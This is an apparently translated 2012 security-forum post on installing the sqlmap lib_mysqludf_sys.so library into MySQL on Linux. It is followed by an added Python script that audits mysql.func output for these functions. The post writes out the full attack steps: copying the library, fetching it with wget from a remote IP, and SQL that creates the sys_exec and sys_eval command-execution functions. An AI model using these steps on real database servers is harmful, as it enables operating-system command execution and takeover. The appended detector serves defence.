294 :SQLMAP lib_mysqludf_sys.so in linux
Posted 2012-10-8 22:35:56
The MySQL installed by default via APT-GET cannot be used for this; it is restricted.

    root@Dis9Team:/pen/sql/sqlmap/udf/mysql/linux/32# file lib_mysqludf_sys.so
    lib_mysqludf_sys.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
    root@Dis9Team:/pen/sql/sqlmap/udf/mysql/linux/32# cp lib_mysqludf_sys.so /var/www/
    root@Dis9Team:/pen/sql/sqlmap/udf/mysql/linux/32# /etc/init.d/apache2 start
    * Starting web server apache2                                  [ OK ]
    root@Dis9Team:/pen/sql/sqlmap/udf/mysql/linux/32#

On the server. This is only a test; if you want to try it yourself, test it in BT5.

    root@ubuntu:~# apt-get install libmysqlclient15-dev
    root@ubuntu:/var/www# wget 5.5.5.7/lib_mysqludf_sys.so
    root@ubuntu:/var/www# mv lib_mysqludf_sys.so /usr/lib/mysql/plugin/

1.SQL

    DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
    DROP FUNCTION IF EXISTS sys_get;
    DROP FUNCTION IF EXISTS sys_set;
    DROP FUNCTION IF EXISTS sys_exec;
    DROP FUNCTION IF EXISTS sys_eval;

    CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
    CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
    CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
    CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
    CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';

Import:

    root@ubuntu:~# mysql -u root -p mysql < 1.sql
    Enter password:
    root@ubuntu:~# mysql -u root -p
    Enter password:
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 75
    Server version: 5.1.61-0ubuntu0.10.10.1-log (Ubuntu)

    Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates. Other names may be trademarks of their respective
    owners.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

    mysql> SELECT sys_eval('id');
    +----------------+
    | sys_eval('id') |
    +----------------+
    | NULL           |
    +----------------+
    1 row in set (0.00 sec)

Function catalog:

    mysql> select * from mysql.func;
    +-----------------------+-----+---------------------+----------+
    | name                  | ret | dl                  | type     |
    +-----------------------+-----+---------------------+----------+
    | sys_set               |   2 | lib_mysqludf_sys.so | function |
    | sys_exec              |   2 | lib_mysqludf_sys.so | function |
    | sys_eval              |   0 | lib_mysqludf_sys.so | function |
    | sys_get               |   0 | lib_mysqludf_sys.so | function |
    | lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function |
    +-----------------------+-----+---------------------+----------+
    5 rows in set (0.00 sec)

To remove: DROP FUNCTION name;
RE: http://www.exploit-db.com/exploits/7856/
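
A defender-side check for the state shown in the `mysql.func` listing above, as an added example that is not part of the original post: it parses the client's table output and flags the functions that 1.SQL creates, rating `sys_exec` and `sys_eval` highest. The `my_metric` / `libmetrics.so` row and the `allowed_libs` parameter are hypothetical.

```python
# Function names created by the 1.SQL script in the post.
SYS_UDFS = {"lib_mysqludf_sys_info", "sys_get", "sys_set", "sys_exec", "sys_eval"}
COMMAND_UDFS = {"sys_exec", "sys_eval"}  # these run OS commands from SQL
# mysql.func.ret codes; 0 and 2 match the string/int functions listed in the post.
RET_TYPES = {"0": "string", "1": "real", "2": "int"}

# Constructed sample: rows from the post plus one hypothetical UDF (my_metric).
SAMPLE = """\
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| sys_set               |   2 | lib_mysqludf_sys.so | function |
| sys_exec              |   2 | lib_mysqludf_sys.so | function |
| sys_eval              |   0 | lib_mysqludf_sys.so | function |
| sys_get               |   0 | lib_mysqludf_sys.so | function |
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function |
| my_metric             |   1 | libmetrics.so       | function |
+-----------------------+-----+---------------------+----------+
"""

def parse_func_table(text):
    """Turn the mysql client's ASCII table into a list of dicts keyed by column."""
    header, rows = None, []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue  # skip borders and any other non-row lines
        cells = [c.strip() for c in line.strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows

def audit(rows, allowed_libs=frozenset()):
    """Return (severity, name, library, return type) for each UDF needing attention."""
    findings = []
    for r in rows:
        name, lib = r["name"].lower(), r["dl"]
        if name in COMMAND_UDFS:
            sev = "high"      # command execution reachable from SQL
        elif name in SYS_UDFS or "mysqludf_sys" in lib.lower():
            sev = "medium"    # same library: environment access or info function
        elif lib not in allowed_libs:
            sev = "review"    # unknown library: confirm it is expected
        else:
            continue
        findings.append((sev, name, lib, RET_TYPES.get(r["ret"], "unknown")))
    return findings
```

Call `audit(parse_func_table(output), allowed_libs={...})` on saved output of `select * from mysql.func;` and remove anything unexpected with the `DROP FUNCTION` statement given above.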


